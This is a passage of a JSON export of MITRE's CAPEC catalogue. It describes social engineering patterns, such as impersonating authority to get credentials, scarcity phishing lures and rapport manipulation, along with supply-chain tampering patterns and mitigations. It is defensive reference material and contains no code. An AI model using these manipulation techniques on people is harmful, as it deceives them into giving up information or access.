personnel.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"407","Exclude_Related":{"Exclude_ID":"513"}}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"416":{"ID":"416","Name":"Manipulate Human Behavior","Abstraction":"Meta","Status":"Stable","Description":"An adversary exploits inherent human psychological predisposition to influence a targeted individual or group to solicit information or manipulate the target into performing an action that serves the adversary\'s interests. Many interpersonal social engineering techniques do not involve outright deception, although they can; many are subtle ways of manipulating a target to remove barriers, make the target feel comfortable, and produce an exchange in which the target is either more likely to share information directly, or let key information slip out unintentionally. A skilled adversary uses these techniques when appropriate to produce the desired outcome. Manipulation techniques vary from the overt, such as pretending to be a supervisor to a help desk, to the subtle, such as making the target feel comfortable with the adversary\'s speech and thought patterns.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attack patterns that manipulate human behavior can result in a wide variety of consequences and potentially affect the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent successful social engineering attacks."},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Methods_of_Attack, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Description Summary, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"}],"Previous_Entry_Name":["Target Influence via Social Engineering",{"Date":"2017-08-04"}]}},"417":{"ID":"417","Name":"Influence Perception","Abstraction":"Standard","Status":"Stable","Description":"The adversary uses social engineering to exploit the target\'s perception of the relationship between the adversary and themselves. This goal is to persuade the target to unknowingly perform an action or divulge information that is advantageous to the adversary.","Likelihood_Of_Attack":"High","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"416"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Resources_Required":{"Resource":"There are no necessary resources required for this attack."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks."},"References":{"Reference":[{"External_Reference_ID":"REF-348"},{"External_Reference_ID":"REF-360"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},"Previous_Entry_Name":["Target Influence via Perception of Reciprocation",{"Date":"2017-08-04"}]}},"418":{"ID":"418","Name":"Influence Perception of Reciprocation","Abstraction":"Detailed","Status":"Draft","Description":"An adversary uses a social engineering techniques to produce a sense of obligation in the target to perform a certain action or concede some sensitive or key piece of information. Obligation has to do with actions one feels they need to take due to some sort of social, legal, or moral requirement, duty, contract, or promise. There are various techniques for fostering a sense of obligation to reciprocate or concede during ordinary modes of communication. One method is to compliment the target, and follow up the compliment with a question. If performed correctly the target may volunteer a key piece of information, sometimes involuntarily.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"417"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks."},"Example_Instances":{"Example":"An adversary develops a relationship with the target to foster a feeling of obligation in them to perform a certain action or concede some information. A perception of obligation/concession means that the target feels they need to behave in some way or perform some sort of action due to being morally or legally bound to do so."},"References":{"Reference":[{"External_Reference_ID":"REF-348"},{"External_Reference_ID":"REF-360"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Methods_of_Attack, References, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},"Previous_Entry_Name":["Target Influence via Perception of Obligation",{"Date":"2017-08-04"}]}},"420":{"ID":"420","Name":"Influence Perception of Scarcity","Abstraction":"Detailed","Status":"Stable","Description":"The adversary leverages a perception of scarcity to persuade the target to perform an action or divulge information that is advantageous to the adversary. By conveying a perception of scarcity, or a situation of limited supply, the adversary aims to create a sense of urgency in the context of a target\'s decision-making process.","Likelihood_Of_Attack":"High","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"417"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks."},"Example_Instances":{"Example":"An adversary sends an email to a target about a limited-time opportunity to claim a considerable monetary reward. The email contains a link to a site which the adversary says is only active for a short time and to the first person to claim it. By convincing the user of the scarcity of the monetary reward, the adversary aims to persuade them to click on the malicious link in the email."},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Methods_of_Attack, References, Related_Attack_Patterns, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},"Previous_Entry_Name":["Target Influence via Perception of Scarcity",{"Date":"2017-08-04"}]}},"421":{"ID":"421","Name":"Influence Perception of Authority","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses a social engineering technique to convey a sense of authority that motivates the target to reveal specific information or take specific action. There are various techniques for producing a sense of authority during ordinary modes of communication. One common method is impersonation. By impersonating someone with a position of power within an organization, an adversary may motivate the target individual to reveal some piece of sensitive information or perform an action that benefits the adversary.","Likelihood_Of_Attack":"High","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"417"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks."},"Example_Instances":{"Example":"The adversary calls the target and announces that they are the head of IT at the target\'s company. The adversary goes on to say that there has been a technical issue and they need the target\'s login credentials for their account. By convincing the target of their authority, the adversary hopes the target will reveal the sensitive information."},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Methods_of_Attack, Related_Attack_Patterns, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"}],"Previous_Entry_Name":["Target Influence via Perception of Authority",{"Date":"2017-08-04"}]}},"422":{"ID":"422","Name":"Influence Perception of Commitment and Consistency","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses social engineering to convince the target to do minor tasks as opposed to larger actions. After complying with a request, individuals are more likely to agree to subsequent requests that are similar in type and required effort.","Likelihood_Of_Attack":"High","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"417"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":["An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.","Individuals should avoid complying with suspicious requests."]},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Related_Attack_Patterns, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}],"Previous_Entry_Name":["Target Influence via Perception of Commitment and Consistency",{"Date":"2017-08-04"}]}},"423":{"ID":"423","Name":"Influence Perception of Liking","Abstraction":"Detailed","Status":"Stable","Description":"The adversary influences the target\'s actions by building a relationship where the target has a liking to the adversary. People are more likely to be influenced by people of whom they are fond, so the adversary attempts to ingratiate themself with the target via actions, appearance, or a combination thereof.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"417"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the types of things that the target likes."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks."},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Related_Attack_Patterns, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"}],"Previous_Entry_Name":["Target Influence via Perception of Liking",{"Date":"2017-08-04"}]}},"424":{"ID":"424","Name":"Influence Perception of Consensus or Social Proof","Abstraction":"Detailed","Status":"Draft","Description":"The adversary influences the target\'s actions by leveraging the inherent human nature to assume behavior of others is appropriate. In situations of uncertainty, people tend to behave in ways they see others behaving. The adversary convinces the target of adopting behavior or actions that is advantageous to the adversary.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"417"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks."},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Related_Attack_Patterns, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},"Previous_Entry_Name":["Target Influence via Perception of Consensus or Social Proof",{"Date":"2017-08-04"}]}},"425":{"ID":"425","Name":"Target Influence via Framing","Abstraction":"Standard","Status":"Draft","Description":"An adversary uses framing techniques to contextualize a conversation so that the target is more likely to be influenced by the adversary\'s point of view. Framing is information and experiences in life that alter the way we react to decisions we must make. This type of persuasive technique exploits the way people are conditioned to perceive data and its significance, while avoiding negative or avoidance responses from the target. Rather than a specific technique framing is a methodology of conversation that slowly encourages the target to adopt to the adversary\'s perspective. One technique of framing is to avoid the use of the word \\"No\\" and to contextualize responses in a manner that is positive. When performed skillfully the target is much more likely to volunteer information or perform actions favorable to the adversary.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"416"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Other","Note":"Successful attacks that influence the target via framing into performing an action or sharing sensitive information can result in a variety of consequences that negatively affect the confidentiality of an application or system."}},"Mitigations":{"Mitigation":["An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks.","Avoid sharing unnecessary information during interactions beyond what is absolutely required for effective communication."]},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}]}},"426":{"ID":"426","Name":"Influence via Incentives","Abstraction":"Standard","Status":"Stable","Description":"The adversary incites a behavior from the target by manipulating something of influence. This is commonly associated with financial, social, or ideological incentivization. Examples include monetary fraud, peer pressure, and preying on the target\'s morals or ethics. The most effective incentive against one target might not be as effective against another, therefore the adversary must gather information about the target\'s vulnerability to particular incentives.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"416"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the incentives that would influence the actions of the specific target."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks."},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},"Previous_Entry_Name":["Target Influence via Manipulation of Incentives",{"Date":"2017-08-04"}]}},"427":{"ID":"427","Name":"Influence via Psychological Principles","Abstraction":"Standard","Status":"Draft","Description":"The adversary shapes the target\'s actions or behavior by focusing on the ways human interact and learn, leveraging such elements as cognitive and social psychology. In a variety of ways, a target can be influenced to behave or perform an action through capitalizing on what scholarship and research has learned about how and why humans react to specific scenarios and cues.","Likelihood_Of_Attack":"Low","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"416"}},"Prerequisites":{"Prerequisite":"The adversary must have the means and knowledge of how to communicate with the target in some manner."},"Skills_Required":{"Skill":["The adversary requires strong inter-personal and communication skills.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Other","Note":"Attacks that successfully influence the target into performing an action via psychological principles can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system."}},"Mitigations":{"Mitigation":"An organization should provide regular, robust cybersecurity training to its employees to prevent social engineering attacks."},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Methods_of_Attack, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},"Previous_Entry_Name":["Target Influence via Psychological Principles",{"Date":"2017-08-04"}]}},"428":{"ID":"428","Name":"Influence via Modes of Thinking","Abstraction":"Detailed","Status":"Draft","Description":"The adversary tailors their communication to the language and thought patterns of the target thereby weakening barriers or reluctance to communication. This method is a way of building rapport with a target by matching their speech patterns and the primary ways or dominant senses with which they make abstractions. This technique can be used to make the target more receptive to sharing information because the adversary has adapted their communication forms to match those of the target. When skillfully employed, the target is likely to be unaware that they are being manipulated.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"427"}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Description Summary"},"Previous_Entry_Name":["Target Influence via Modes of Thinking",{"Date":"2017-08-04"}]}},"429":{"ID":"429","Name":"Target Influence via Eye Cues","Abstraction":"Detailed","Status":"Draft","Description":"The adversary gains information via non-verbal means from the target through eye movements.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"427"}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary"}}},"433":{"ID":"433","Name":"Target Influence via The Human Buffer Overflow","Abstraction":"Detailed","Status":"Draft","Description":"An attacker utilizes a technique to insinuate commands to the subconscious mind of the target via communication patterns. The human buffer overflow methodology does not rely on over-stimulating the mind of the target, but rather embedding messages within communication that the mind of the listener assembles at a subconscious level. The human buffer-overflow method is similar to subconscious programming to the extent that messages are embedded within the message. The fundamental difference is that embedded messages have a complete semantic quality, rather than mere imagery, and the mind of the target tends to key off of particular dominant patterns. The remaining information, carefully structured, speaks directly to the subconscious with a subtle, indirect, command. The effect is to produce a pattern of thinking that the attacker has predetermined but is buried within the message and not overtly stated. Structuring a human \\"buffer overflow\\" requires precise attention to detail and the use of information in a manner that distracts the conscious mind from the message the subconscious is receiving.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"427"}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"434":{"ID":"434","Name":"Target Influence via Interview and Interrogation","Abstraction":"Detailed","Status":"Draft","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"427"}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"435":{"ID":"435","Name":"Target Influence via Instant Rapport","Abstraction":"Detailed","Status":"Draft","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"427"}},"References":{"Reference":{"External_Reference_ID":"REF-348"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"438":{"ID":"438","Name":"Modification During Manufacture","Abstraction":"Meta","Status":"Draft","Description":"An attacker modifies a technology, product, or component during a stage in its manufacture for the purpose of carrying out an attack against some entity involved in the supply chain lifecycle. There are an almost limitless number of ways an attacker can modify a technology when they are involved in its manufacture, as the attacker has potential inroads to the software composition, hardware design and assembly, firmware, or basic design mechanics. Additionally, manufacturing of key components is often outsourced with the final product assembled by the primary manufacturer. The greatest risk, however, is deliberate manipulation of design specifications to produce malicious hardware or devices. There are billions of transistors in a single integrated circuit and studies have shown that fewer than 10 transistors are required to create malicious functionality.","Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1195","Entry_Name":"Supply Chain Compromise"}},"References":{"Reference":[{"External_Reference_ID":"REF-379"},{"External_Reference_ID":"REF-380"},{"External_Reference_ID":"REF-381"},{"External_Reference_ID":"REF-382","Section":"Section 1. Introduction"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}],"Previous_Entry_Name":["Integrity Modification During Manufacture",{"Date":"2015-11-09"}]}},"439":{"ID":"439","Name":"Manipulation During Distribution","Abstraction":"Meta","Status":"Draft","Description":"An attacker undermines the integrity of a product, software, or technology at some stage of the distribution channel. The core threat of modification or manipulation during distribution arise from the many stages of distribution, as a product may traverse multiple suppliers and integrators as the final asset is delivered. Components and services provided from a manufacturer to a supplier may be tampered with during integration or packaging.","Example_Instances":{"Example":["A malicious OEM provider, or OEM provider employee or contractor, may install software, or modify existing code, during distribution.","External contractors involved in the packaging or testing of products or components may install software, or modify existing code, during distribution."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"1269"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1195","Entry_Name":"Supply Chain Compromise"}},"References":{"Reference":[{"External_Reference_ID":"REF-379"},{"External_Reference_ID":"REF-384"},{"External_Reference_ID":"REF-382","Section":"Section 1. Introduction"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}],"Previous_Entry_Name":["Integrity Modification During Distribution",{"Date":"2015-11-09"}]}},"440":{"ID":"440","Name":"Hardware Integrity Attack","Abstraction":"Meta","Status":"Stable","Description":"An adversary exploits a weakness in the system maintenance process and causes a change to be made to a technology, product, component, or sub-component or a new one installed during its deployed use at the victim location for the purpose of carrying out an attack.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Prerequisites":{"Prerequisite":"Influence over the deployed system at a victim location."},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Execute Unauthorized Commands"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1200","Entry_Name":"Hardware Additions"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary, Examples-Instances, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Description, Taxonomy_Mappings"}],"Previous_Entry_Name":["Integrity Modification During Deployed Use",{"Date":"2015-11-09"}]}},"441":{"ID":"441","Name":"Malicious Logic Insertion","Abstraction":"Meta","Status":"Stable","Description":"An adversary installs or adds malicious logic (also known as malware) into a seemingly benign component of a fielded system. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. With the proliferation of mass digital storage and inexpensive multimedia devices, Bluetooth and 802.11 support, new attack vectors for spreading malware are emerging for things we once thought of as innocuous greeting cards, picture frames, or digital projectors. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems and their components that are still under development and part of the supply chain.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Prerequisites":{"Prerequisite":"Access to the component currently deployed at a victim 